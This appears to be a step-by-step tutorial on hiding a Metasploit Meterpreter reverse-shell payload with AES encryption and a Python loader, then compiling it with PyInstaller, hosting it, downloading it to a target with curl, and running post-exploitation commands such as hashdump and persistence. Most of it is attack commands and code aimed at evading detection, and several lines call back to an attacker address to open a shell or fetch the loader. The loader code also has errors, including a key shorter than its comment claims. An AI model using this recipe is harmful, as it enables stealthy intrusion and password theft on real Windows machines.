12. Metasploit Encrypting and Obfuscating a Payload using AES

A step-by-step example of encrypting and obfuscating a payload using AES encryption and creating a custom Python loader to execute it stealthily.

Step 1: Generate the Payload¶

We’ll create a raw Meterpreter reverse shell payload.

Command:¶

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw -o payload.raw

Payload: windows/meterpreter/reverse_tcp opens a reverse shell to the attacker's machine.
Output: Saved as payload.raw.

Step 2: Encrypt the Payload¶

We’ll use OpenSSL to encrypt the payload using AES-256-CBC.

Command:¶

openssl enc -aes-256-cbc -salt -in payload.raw -out payload.enc -pass pass:mysecretkey

Input: payload.raw is the raw shellcode.
Output: payload.enc is the encrypted payload.
Key: mysecretkey (replace with a strong key).

Step 3: Create a Python Loader¶

The loader will decrypt and execute the payload on the target system.

Python Code:¶

import os
from Crypto.Cipher import AES

# Configuration
key = b"mysecretkeymysecretkeymysecretk"  # 32 bytes (AES-256 key)
iv = b"16_BYTE_INIT_VEC"                 # 16 bytes (AES initialization vector)

# Encrypted payload (read from file or hardcoded)
encrypted_payload = b"ENCRYPTED_PAYLOAD_HERE"

# Decrypt the payload
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted_payload = cipher.decrypt(encrypted_payload)

# Save the decrypted payload to a file
with open("decrypted_payload.exe", "wb") as f:
    f.write(decrypted_payload)

# Execute the decrypted payload
os.system("decrypted_payload.exe")

Step 4: Replace Placeholders¶

Replace ENCRYPTED_PAYLOAD_HERE:
- Read payload.enc and convert to a byte string:
```
xxd -i payload.enc
```
  - Copy the output into the encrypted_payload variable in the Python script.
  - Replace 16_BYTE_INIT_VEC:
- Generate a random 16-byte IV:
```
openssl rand -hex 16
```
- Use the result as the iv in the script.

Step 5: Compile the Loader¶

To convert the Python loader into an executable:

Command:¶

pyinstaller --onefile --noconsole loader.py

Output: A standalone executable named loader.

Step 6: Serve the Loader¶

Use a simple HTTP server to host the loader:

python3 -m http.server 8080

Step 7: Set Up the Listener¶

Start Metasploit:
```
msfconsole
```

Configure a handler:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
exploit

Step 8: Execute the Loader on the Target¶

On the target machine, download the loader:

curl http://192.168.1.10:8080/loader.exe -o loader.exe

Execute the loader:
```
loader.exe
```

Step 9: Post-Exploitation¶

After execution, you’ll get a Meterpreter session on the attacker's machine.

Useful Post-Exploitation Commands:¶

Gather System Info:
```
sysinfo
```
Dump Password Hashes:
```
hashdump
```

Persistence:

run persistence -U -i 10 -p 4444 -r 192.168.1.10